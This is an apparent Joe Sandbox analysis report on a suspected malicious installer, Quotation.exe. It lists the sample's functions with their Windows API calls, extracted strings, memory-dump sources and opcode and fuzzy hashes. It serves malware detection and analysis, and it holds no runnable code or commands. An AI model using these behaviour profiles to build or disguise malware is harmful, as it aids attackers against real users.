Instruction Fuzzy Hash: E221D675500B049FDB649F28DA4895BB7F4EF45711B108A3EE896A26A0DB38E814DF28

Function 0040362D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040364B
MulDiv.KERNEL32(00124320,00000064,00124320), ref: 00403673
wsprintfW.USER32 ref: 00403683
SetWindowTextW.USER32(?,?), ref: 00403693
SetDlgItemTextW.USER32(?,00000406,?), ref: 004036A5

Strings

verifying installer: %d%%, xrefs: 0040367D

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
Instruction ID: 44471e5cb11ab05bb0c6ce4c76b363bdac3f6882ce80e8a3b6daee8e8afc751d
Opcode Fuzzy Hash: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
Instruction Fuzzy Hash: BE018F71540208BBDF20AF60DE45BAA3B28A700305F00803AF642B51E0DBB58554CF4C

Function 6FF810C7 Relevance: 8.9, APIs: 7, Instructions: 162memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6FF8116B
GlobalFree.KERNEL32(00000000), ref: 6FF811AE
GlobalFree.KERNEL32(00000000), ref: 6FF811CD
GlobalAlloc.KERNEL32(00000040,?), ref: 6FF811E6
GlobalFree.KERNEL32 ref: 6FF8125C
GlobalFree.KERNEL32(?), ref: 6FF812A7
GlobalFree.KERNEL32(00000000), ref: 6FF812BF

Memory Dump Source

Source File: 00000000.00000002.2392860438.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true

Associated: 00000000.00000002.2392819480.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2392898667.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2392959180.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff80000_Quotation.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: fb52a0bcc8f741cbb293caee350dd3bf4319181d360246f52919b03f162664c3
Instruction ID: a9c55cd3b43aab519c6e23a22b833c370c45884679d2246364a95b347d9fbef8
Opcode Fuzzy Hash: fb52a0bcc8f741cbb293caee350dd3bf4319181d360246f52919b03f162664c3
Instruction Fuzzy Hash: 3351B0725107029FCB10CF68D840AAA77B8FF4A324B14062AF975DB360E735E910CB91

Function 6FF81F1E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 6FF81F51
lstrcpyW.KERNEL32(?,error,00001018,6FF81765,00000000,?), ref: 6FF81F71

Strings

error, xrefs: 6FF81F67, 6FF81F6F
callback%d, xrefs: 6FF81F4B
s<u, xrefs: 6FF81F51

Memory Dump Source

Source File: 00000000.00000002.2392860438.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true

Associated: 00000000.00000002.2392819480.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2392898667.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2392959180.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff80000_Quotation.jbxd

Similarity

API ID: lstrcpywsprintf
String ID: callback%d$error$s<u
API String ID: 2408954437-3671815815
Opcode ID: c059773d778b48cece091045804e1fb52ce321e581aad8d73e748ff3d5c7c0f7
Instruction ID: f4cac8586b14cb935a76d3bfc18b0729edd23c7970dc066855d7a720b102e69b
Opcode Fuzzy Hash: c059773d778b48cece091045804e1fb52ce321e581aad8d73e748ff3d5c7c0f7
Instruction Fuzzy Hash: 96F01C35204110AFD7088B18D948EBB73B9FF8A314F0586A8F9799B311C774AC549B91

Function 6FF82049 Relevance: 7.6, APIs: 5, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 6FF821BF

Part of subcall function 6FF812E1: lstrcpynW.KERNEL32(00000000,?,6FF8156A,?,6FF811C4,-000000A0), ref: 6FF812F1

GlobalAlloc.KERNEL32(00000040), ref: 6FF8212C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FF8214C

Memory Dump Source

Source File: 00000000.00000002.2392860438.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true

Associated: 00000000.00000002.2392819480.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2392898667.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2392959180.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff80000_Quotation.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: a543c6db672500f2ffef8a25024632632ba1a48dd3a759fd1a583475b26fb321
Instruction ID: 3bd90ac4521c95a5520b4500b78554f18e6933d52fa9941e42d3f68046f79865
Opcode Fuzzy Hash: a543c6db672500f2ffef8a25024632632ba1a48dd3a759fd1a583475b26fb321
Instruction Fuzzy Hash: A541F372405B05EFC7009F68C944BEA7BB8FF06354B94033EE979DA289D7727590CAA0

Function 6FF81F7B Relevance: 7.5, APIs: 5, Instructions: 38memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,6FF82B4C,00000000,00000808), ref: 6FF81F8C
GlobalAlloc.KERNEL32(00000040,00000000), ref: 6FF81F97
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FF81FAB
GetProcAddress.KERNEL32(?,00000000), ref: 6FF81FB6
GlobalFree.KERNEL32(00000000), ref: 6FF81FBF

Memory Dump Source

Source File: 00000000.00000002.2392860438.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true

Associated: 00000000.00000002.2392819480.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2392898667.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2392959180.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff80000_Quotation.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 37d728c2fcc598573163d6719fe4619a0c8d27e85d43941967de5820ee62663c
Instruction ID: 1426c93540283eff0f520808fc03329eb2d6bb3224e15093e3a8d5941e0f5cc6
Opcode Fuzzy Hash: 37d728c2fcc598573163d6719fe4619a0c8d27e85d43941967de5820ee62663c
Instruction Fuzzy Hash: D5F0C032118528BBCA101AE7DC0CE67BEBCFB8B6FAB160215F629D13B0D56268109771

Function 00406534 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403CA1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 0040653A
CharPrevW.USER32(?,00000000), ref: 00406545
lstrcatW.KERNEL32(?,004082B0), ref: 00406557

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406534

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-297319885
Opcode ID: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
Instruction ID: 997ea4b4438496dccce44eacbb2634370b3c3ae0899ac86cf6792f2d8b8f87b4
Opcode Fuzzy Hash: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
Instruction Fuzzy Hash: F7D05E31102924AFC2026B58AE08D9B77ACEF46341341406EFAC1B3160CB745D5287ED

Function 6FF81CC7 Relevance: 6.2, APIs: 4, Instructions: 209COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 6FF81D37
GlobalFree.KERNEL32(?), ref: 6FF81DF2
GlobalFree.KERNEL32(00000000), ref: 6FF81DF5
__alldvrm.LIBCMT ref: 6FF81E2F

Memory Dump Source

Source File: 00000000.00000002.2392860438.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true

Associated: 00000000.00000002.2392819480.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2392898667.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2392959180.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ff80000_Quotation.jbxd

Similarity

API ID: FreeGlobal$__alldvrm
String ID:
API String ID: 482422042-0
Opcode ID: 528acab676e03b8bbd1e2a688bd50fcb6fef5fe6b32b20a0e06dabd8c928b834
Instruction ID: b1a424f18152a33c41ba0db97387f50b6f2739dad30f1e9e4ffcc0c26ba8837b
Opcode Fuzzy Hash: 528acab676e03b8bbd1e2a688bd50fcb6fef5fe6b32b20a0e06dabd8c928b834
Instruction Fuzzy Hash: 035107737483068B97149E798984ABA77F6BFCA714B104B2EF072C7350F7A1F9858252

Function 00403367 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00403378
GetTickCount.KERNEL32 ref: 00403397
CreateDialogParamW.USER32(0000006F,00000000,0040362D,00000000), ref: 004033B6
ShowWindow.USER32(00000000,00000005), ref: 004033C4

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 357b023d8aff776a3d5515b2d6cdf3b091415c345a00606534bd97e45556d1c1
Instruction ID: 5fb2c38a213eff1d2f515c73fe307429b33afba48c29838db2cc379488067e45
Opcode Fuzzy Hash: 357b023d8aff776a3d5515b2d6cdf3b091415c345a00606534bd97e45556d1c1
Instruction Fuzzy Hash: C9F0F870551700EBDB209F60EF8EB163AA8B740B02F505579F941B51F0DB788514CA5C

Function 00406CEE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403436,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Quotation.exe,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 00406CF4
CharPrevW.USER32(?,00000000), ref: 00406D05

Strings

C:\Users\user\Desktop, xrefs: 00406CEE

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-2743851969
Opcode ID: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
Instruction ID: 8ca8e9e1e5128dac63b4d4f5950f4db4f9885d0bf84f26727eb387c0c5501f09
Opcode Fuzzy Hash: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
Instruction Fuzzy Hash: 75D05E31015924DBD7626B18ED059AF77A8EF0130030A846EE983E3164CB385C9187BD

Analysis Process: Quotation.exePID: 4068, Parent PID: 7016COMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	117
Total number of Limit Nodes:	10

Executed Functions

Function 3AB42338 Relevance: 6.0, Strings: 4, Instructions: 1036COMMON

Download Yara Rule

Strings

,D48, xrefs: 3AB42CCD
F48, xrefs: 3AB4315A
>48U, xrefs: 3AB42B8C
,D48, xrefs: 3AB42AC2

Memory Dump Source

Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd

Similarity

API ID:
String ID: ,D48$,D48$>48U$F48
API String ID: 0-2931146892
Opcode ID: f094c011b7eb34cd3d628f49f8bcec48dcbc87f604be0e7c9d762bd5be6f667b
Instruction ID: a202714e6ab998eaa7cf095fc0cde099429ef855a2ae5c85f6ee02e1ddf575ff
Opcode Fuzzy Hash: f094c011b7eb34cd3d628f49f8bcec48dcbc87f604be0e7c9d762bd5be6f667b
Instruction Fuzzy Hash: 10925738A002148FEB58CB68C584B9DBBF2FF49315F5984A9D449AB351DB35EC81EF90

Function 3AB46698 Relevance: 3.3, Strings: 2, Instructions: 830COMMON

Download Yara Rule

Strings

-<8, xrefs: 3AB468DE
,D48, xrefs: 3AB46F57

Memory Dump Source

Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd

Similarity

API ID:
String ID: ,D48$-<8
API String ID: 0-2679012280
Opcode ID: e6d68af695fc5d9a9999f237c64692129068cdeb58f7ee8fb4f19931ea621af8
Instruction ID: a4a1ab1ab8bd1e9013bc3e4e8e3753093e696ecdcaf05de13d47a8d4de96105f
Opcode Fuzzy Hash: e6d68af695fc5d9a9999f237c64692129068cdeb58f7ee8fb4f19931ea621af8
Instruction Fuzzy Hash: FB62BF34B002149FEB14DBA8D5A0B9DBBF6EF89354F548469E405EB391DB39DC42EB80

Function 3AB45648 Relevance: 3.1, Strings: 2, Instructions: 590
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

*980*98D*98, xrefs: 3AB45AC4, 3AB45AC9
$, xrefs: 3AB45D54

Memory Dump Source

Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd

Similarity

API ID:
String ID: *980*98D*98$$
API String ID: 0-2248006349
Opcode ID: fdee8d5819e665c8e9fd094311950251c07b0e7616cd1a8a4578ce219805e9c8
Instruction ID: e56ac7658edf4e5e9e5035d6409fe218a43e22a9d6ea694346edb27c3f5504d7
Opcode Fuzzy Hash: fdee8d5819e665c8e9fd094311950251c07b0e7616cd1a8a4578ce219805e9c8
Instruction Fuzzy Hash: 1222E475E006248FEB14CBA8C58069EBBB6EF85320F24856AD455AB345DF35DC42EB90

Function 3AB43108 Relevance: 3.0, Strings: 2, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

F48, xrefs: 3AB4315A
,F48, xrefs: 3AB4316C

Memory Dump Source

Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd

Similarity

API ID:
String ID: ,F48$F48
API String ID: 0-385877324
Opcode ID: 37c1d5841f450f23f7119c87091da5dcabeb4d5b4b9cc3969696d76c671d32c5
Instruction ID: 68afd926966e2dd44fde1fb0b7e686d7f388dfeef4a4b14e7457beb0ac86ae90
Opcode Fuzzy Hash: 37c1d5841f450f23f7119c87091da5dcabeb4d5b4b9cc3969696d76c671d32c5
Instruction Fuzzy Hash: 64325F34E10759CBDB14DBA9C89099DF7B6FFC9300F64C66AD419BB210EB30A985DB90

Function 0015A950 Relevance: 2.9, Instructions: 2858COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fd228b9d2d0ccb5c9e072b07b8769e49647a33194622617562ad5aa02a01c46
Instruction ID: 8eb91c5e462833cb373ed4085094a398e27870fbf0d9cc6fe9218422fba67ec4
Opcode Fuzzy Hash: 7fd228b9d2d0ccb5c9e072b07b8769e49647a33194622617562ad5aa02a01c46
Instruction Fuzzy Hash: 6563F831D10B1ACACB11EF68C8945A9F7B1FF99300F55D79AE4587B121EB70AAC4CB81

Function 3AB47E20 Relevance: 1.7, Strings: 1, Instructions: 473COMMON

Download Yara Rule

Strings

DR48, xrefs: 3AB482A1

Memory Dump Source

Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd

Similarity

API ID:
String ID: DR48
API String ID: 0-3374490049
Opcode ID: c89d0666d834a7a45d7df536df41abf9622a856d1829095feeed1293b8bdaea4
Instruction ID: aeb814518e9817ee617980fa0ab9031b1ffcfe67adc46778fbfc0707ba4840f3
Opcode Fuzzy Hash: c89d0666d834a7a45d7df536df41abf9622a856d1829095feeed1293b8bdaea4
Instruction Fuzzy Hash: 02029D34B002159FEB18DBA8D894A9EB7F6FF89340F148529D415AB391DB35EC42EB90

Function 00153E80 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\Vcm, xrefs: 001540CB

Memory Dump Source

Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Quotation.jbxd

Similarity

API ID:
String ID: \Vcm
API String ID: 0-3044874373
Opcode ID: 5075996c69a8bc8105687ee6932881b82262a269eb56aac85e40972ad4148eda
Instruction ID: 4998dbd98f40e824e2a0cf037a6e95dedb0c5be686ed2c25dce82ea517e3c020
Opcode Fuzzy Hash: 5075996c69a8bc8105687ee6932881b82262a269eb56aac85e40972ad4148eda
Instruction Fuzzy Hash: 40917170E00609CFDF14CFA9C9857DEBBF1AF88315F148529E824EB294DB749989CB81

Function 3AB4C220 Relevance: .6, Instructions: 646COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c8f2c872b992f27b2800bc575be541337a9d4d89f662af0afcce4cd3edb747b
Instruction ID: a31d333c0e20817ea0097090d70e3cc6c9a7c77d0354a35e5d32a4d6dce60430
Opcode Fuzzy Hash: 2c8f2c872b992f27b2800bc575be541337a9d4d89f662af0afcce4cd3edb747b
Instruction Fuzzy Hash: A532D274B002148FEB54CFA8D894B9EB7B6FB8A710F148529E415EB351CB34EC42EB91

Function 0015D990 Relevance: .6, Instructions: 643COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf48d43a925da2d7f0beeeece78eb7f75cfbe4e2da95b458fbda8ff2a5d7f59b
Instruction ID: 597335d233c8a6c87deec1ac28d3b6753696ddf59643b2bab0ecd13bbaefbbff
Opcode Fuzzy Hash: bf48d43a925da2d7f0beeeece78eb7f75cfbe4e2da95b458fbda8ff2a5d7f59b
Instruction Fuzzy Hash: C1221471A04215CFDB25CB68D8807BEBBB2EF85311F1585AAD865DF282C735EC4AC790

Function 3AB4B2BA Relevance: .6, Instructions: 566COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 078f94acf5e61c91e2af2f5760d12d2d05b37907b428bbf6a0526a0bd7af27ab
Instruction ID: 6f609a2cae822c81675a7a27780a272682a4db76b58aa1758ad92ed8f27da008
Opcode Fuzzy Hash: 078f94acf5e61c91e2af2f5760d12d2d05b37907b428bbf6a0526a0bd7af27ab
Instruction Fuzzy Hash: 68228078E002198BFF54CBACC49079DB7B6FB49350F24842AE549EB391DA35DC81BB91

Function 0015A500 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c030ea7cab0235823a809be4693a34fd490d616a941523e529fc81803287e02
Instruction ID: df157f8a7ddef9bf41bda99516b95d0f31b513c98debcc321379058633d85152
Opcode Fuzzy Hash: 4c030ea7cab0235823a809be4693a34fd490d616a941523e529fc81803287e02
Instruction Fuzzy Hash: CCD18D70A40205CFDB14CFA8D880B9EBBB6EF89311F548669D819DB391D771DC498B92

Function 00154A98 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9d92e61f5f69512f2feccb62329ec8e82bd1f7d7e950c9d9feda8e5e3acca92
Instruction ID: 22eaa49d95816d0cdb81b4926a19532ddf83e12e0c413bae912010f6af8e3bac
Opcode Fuzzy Hash: b9d92e61f5f69512f2feccb62329ec8e82bd1f7d7e950c9d9feda8e5e3acca92
Instruction Fuzzy Hash: E2B15470E00309CFDB14CFA9D89579DBBF2AF88359F148529D825EB354EB749889CB81

Function 00158729 Relevance: 6.8, Strings: 5, Instructions: 558
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`"48, xrefs: 00158836
@ 48, xrefs: 001588BA
`48, xrefs: 00158EC8
p$48, xrefs: 001587A6
848, xrefs: 00158EAA

Memory Dump Source

Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_150000_Quotation.jbxd

Similarity

API ID:
String ID: 848$@ 48$`48$`"48$p$48
API String ID: 0-3022964796
Opcode ID: c1328203f92fcf791f2a6144bb31cbbc92ffe6b4d81530b9a81cc7c8616b1c8f
Instruction ID: c33bfc0202d5957b774c144488a4b170a23d8805f85add057a3ee67c7ddff7eb
Opcode Fuzzy Hash: c1328203f92fcf791f2a6144bb31cbbc92ffe6b4d81530b9a81cc7c8616b1c8f
Instruction Fuzzy Hash: 4112A3B4700201CBEB55AB78D4A126D73EAFBCA341B20892AE415EF351CF79DD478B91

Function 3B675E81 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 3B675F0E
